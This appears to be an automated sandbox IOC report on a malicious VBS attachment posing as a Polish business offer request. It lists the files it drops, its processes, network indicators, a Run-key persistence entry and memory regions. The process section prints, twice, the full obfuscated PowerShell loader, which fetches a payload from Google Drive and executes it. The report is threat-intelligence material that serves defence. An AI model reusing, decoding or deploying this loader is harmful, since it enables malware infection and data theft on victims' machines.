IOC Report
Zapytanie ofertowe (GASTRON 07022024).vbs

loading gif

Files

File Path
Type
Category
Malicious
Zapytanie ofertowe (GASTRON 07022024).vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0svqftf5.b3a.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_affrgltk.dn1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1zfskfq.mda.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e1edl1gs.ljq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Veinless.Dis
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
malicious
C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe
"C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
http://mail.fiszebrandt.pl
unknown
https://drive.goog
unknown
https://drive.google.com/y
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://drive.google.com/uc?ex
unknown
https://drive.google.com/u
unknown
https://go.micro
unknown
https://drive.googPz
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.usercontent.googh
unknown
http://r10.o.lencr.org0#
unknown
http://drive.google.com
unknown
https://drive.google.
unknown
https://drive.go
unknown
https://github.com/Pester/Pester
unknown
https://drive.goo
unknown
https://www.google.com
unknown
https://drive.g
unknown
http://crl.microsoftg
unknown
https://drive.google.com/uc
unknown
https://aka.ms/pscore6lB
unknown
https://drive.google.com/
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://drive.googl
unknown
https://drive.google.com/uc?e
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.google.c
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
https://drive.google.com/uc?
unknown
http://fiszebrandt.pl
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://r10.i.lencr.org/0
unknown
https://drive.google
unknown
https://drive.google.co
unknown
There are 33 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
fiszebrandt.pl
195.128.154.10
malicious
mail.fiszebrandt.pl
unknown
malicious
drive.google.com
142.250.185.174
drive.usercontent.google.com
142.250.74.193

IPs

IP
Domain
Country
Malicious
195.128.154.10
fiszebrandt.pl
Poland
malicious
142.250.185.174
drive.google.com
United States
142.250.74.193
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
fMNDB
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 12 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2303A000
trusted library allocation
page read and write
malicious
56CA000
trusted library allocation
page read and write
malicious
16B68565000
trusted library allocation
page read and write
malicious
8200000
direct allocation
page execute and read and write
malicious
2300F000
trusted library allocation
page read and write
malicious
22FC1000
trusted library allocation
page read and write
malicious
96F5000
direct allocation
page execute and read and write
malicious
29F53A3C000
heap
page read and write
7CB0000
heap
page read and write
251A0000
trusted library allocation
page read and write
29F53744000
heap
page read and write
CF96E7F000
stack
page read and write
25160000
trusted library allocation
page read and write
435E000
stack
page read and write
29F5366E000
heap
page read and write
29F53481000
heap
page read and write
29F516C2000
heap
page read and write
29F5366E000
heap
page read and write
6FA0000
trusted library allocation
page read and write
B7155FF000
stack
page read and write
2FD156E000
stack
page read and write
29F5362B000
heap
page read and write
7DAD000
stack
page read and write
16B5A4AB000
trusted library allocation
page read and write
7FFAAC420000
trusted library allocation
page read and write
6EC2D000
unkown
page read and write
59E5000
remote allocation
page execute and read and write
27CA000
heap
page read and write
277A000
trusted library allocation
page execute and read and write
6EC2D000
unkown
page read and write
2435D075000
heap
page read and write
29F53A3B000
heap
page read and write
7540000
direct allocation
page read and write
16B582E1000
heap
page read and write
251B0000
trusted library allocation
page read and write
7FFAAC104000
trusted library allocation
page read and write
7328000
heap
page read and write
256E0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5366E000
heap
page read and write
2FF4000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
251A0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
16B687EE000
trusted library allocation
page read and write
28B0000
heap
page read and write
71B0000
trusted library allocation
page read and write
29F534A8000
heap
page read and write
17D000
unkown
page readonly
251B0000
trusted library allocation
page read and write
2750000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
7CAE000
stack
page read and write
256D0000
trusted library allocation
page read and write
3200000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
69AA000
stack
page read and write
2FF3000
trusted library allocation
page execute and read and write
74D0000
direct allocation
page read and write
63E5000
remote allocation
page execute and read and write
2A267940000
heap
page read and write
29F535AD000
heap
page read and write
25220000
trusted library allocation
page read and write
29F53A3B000
heap
page read and write
251A7000
trusted library allocation
page read and write
29F5362B000
heap
page read and write
22DC2000
trusted library allocation
page read and write
25320000
trusted library allocation
page read and write
16B58A2C000
trusted library allocation
page read and write
16B566B5000
heap
page read and write
29F538A1000
heap
page read and write
4531000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
4B0000
heap
page read and write
4E6C000
trusted library allocation
page read and write
7E41000
heap
page read and write
16B589C4000
trusted library allocation
page read and write
AAF5000
direct allocation
page execute and read and write
160000
unkown
page readonly
251B0000
trusted library allocation
page read and write
6AE0000
heap
page read and write
29F5362B000
heap
page read and write
161000
unkown
page execute read
29F5366E000
heap
page read and write
7FFAAC380000
trusted library allocation
page read and write
256F0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
16B5A591000
trusted library allocation
page read and write
22B40000
direct allocation
page read and write
16B58D86000
trusted library allocation
page read and write
7FFAAC310000
trusted library allocation
page read and write
16B569A0000
heap
page read and write
2FFD000
trusted library allocation
page execute and read and write
6F60000
trusted library allocation
page read and write
16B7099F000
heap
page read and write
29F534A8000
heap
page read and write
16B5665C000
heap
page read and write
22DF0000
heap
page read and write
29F5366E000
heap
page read and write
29F538A1000
heap
page read and write
2785000
trusted library allocation
page execute and read and write
7FFAAC10D000
trusted library allocation
page execute and read and write
16B56650000
heap
page read and write
29F538A1000
heap
page read and write
7DB0000
trusted library allocation
page execute and read and write
25310000
trusted library allocation
page read and write
22C1E000
stack
page read and write
7FFAAC450000
trusted library allocation
page read and write
2782000
trusted library allocation
page read and write
2293C000
stack
page read and write
380000
heap
page read and write
82C0000
direct allocation
page read and write
29F5348C000
heap
page read and write
29F53B08000
heap
page read and write
16B5669B000
heap
page read and write
29F538A1000
heap
page read and write
4CD6000
trusted library allocation
page read and write
24B0000
heap
page read and write
2435D070000
heap
page read and write
2FD1AFE000
stack
page read and write
8240000
direct allocation
page read and write
72DA000
heap
page read and write
25170000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
29F53A3C000
heap
page read and write
29F5366E000
heap
page read and write
4DAE000
trusted library allocation
page read and write
6EC26000
unkown
page readonly
16B5834E000
heap
page read and write
251A0000
trusted library allocation
page read and write
28FF000
unkown
page read and write
16B5A37B000
trusted library allocation
page read and write
16B709A7000
heap
page read and write
6DC0000
heap
page read and write
29F53A3C000
heap
page read and write
8220000
direct allocation
page read and write
29F5366E000
heap
page read and write
2BD0000
heap
page read and write
29F5199A000
heap
page read and write
29F51607000
heap
page read and write
7FB40000
trusted library allocation
page execute and read and write
16B5A304000
trusted library allocation
page read and write
22D8E000
stack
page read and write
29F53A3B000
heap
page read and write
29F5360B000
heap
page read and write
7DD0000
heap
page read and write
29F5361D000
heap
page read and write
251B0000
trusted library allocation
page read and write
22DA0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
5531000
trusted library allocation
page read and write
16B569A5000
heap
page read and write
29F5366E000
heap
page read and write
29F5360B000
heap
page read and write
4BBE000
stack
page read and write
22DD6000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5362B000
heap
page read and write
2435CF90000
heap
page read and write
7177000
heap
page read and write
251A0000
trusted library allocation
page read and write
2506A000
heap
page read and write
7FFAAC430000
trusted library allocation
page read and write
2AD4000
heap
page read and write
274E000
stack
page read and write
22B2F000
stack
page read and write
251A2000
trusted library allocation
page read and write
2435CF70000
heap
page read and write
16B56697000
heap
page read and write
24D0000
heap
page read and write
29F5360B000
heap
page read and write
16B58BE3000
trusted library allocation
page read and write
7C6D000
stack
page read and write
251D0000
trusted library allocation
page read and write
28A0000
heap
page read and write
29F538A1000
heap
page read and write
251A0000
trusted library allocation
page read and write
22DDD000
trusted library allocation
page read and write
5559000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
7000000
trusted library allocation
page read and write
2EBF000
stack
page read and write
29F51694000
heap
page read and write
22C9C000
stack
page read and write
7E08000
heap
page read and write
29F535D5000
heap
page read and write
29F5362B000
heap
page read and write
160000
unkown
page readonly
29F53481000
heap
page read and write
29F53A3B000
heap
page read and write
29F535D5000
heap
page read and write
268E000
stack
page read and write
29F535AD000
heap
page read and write
7FFAAC1E6000
trusted library allocation
page execute and read and write
29F51998000
heap
page read and write
251B0000
trusted library allocation
page read and write
8CF5000
direct allocation
page execute and read and write
7C00000
trusted library allocation
page read and write
2AE0000
heap
page read and write
165000
unkown
page readonly
7FFAAC100000
trusted library allocation
page read and write
2FD1FBB000
stack
page read and write
251F0000
trusted library allocation
page read and write
7DC0000
trusted library allocation
page read and write
29F535B8000
heap
page read and write
251B0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
2300D000
trusted library allocation
page read and write
29F534A8000
heap
page read and write
251A0000
trusted library allocation
page read and write
17D000
unkown
page readonly
22AB0000
remote allocation
page read and write
16B68510000
trusted library allocation
page read and write
25180000
trusted library allocation
page read and write
2FD1D38000
stack
page read and write
82F0000
direct allocation
page read and write
7FFAAC320000
trusted library allocation
page read and write
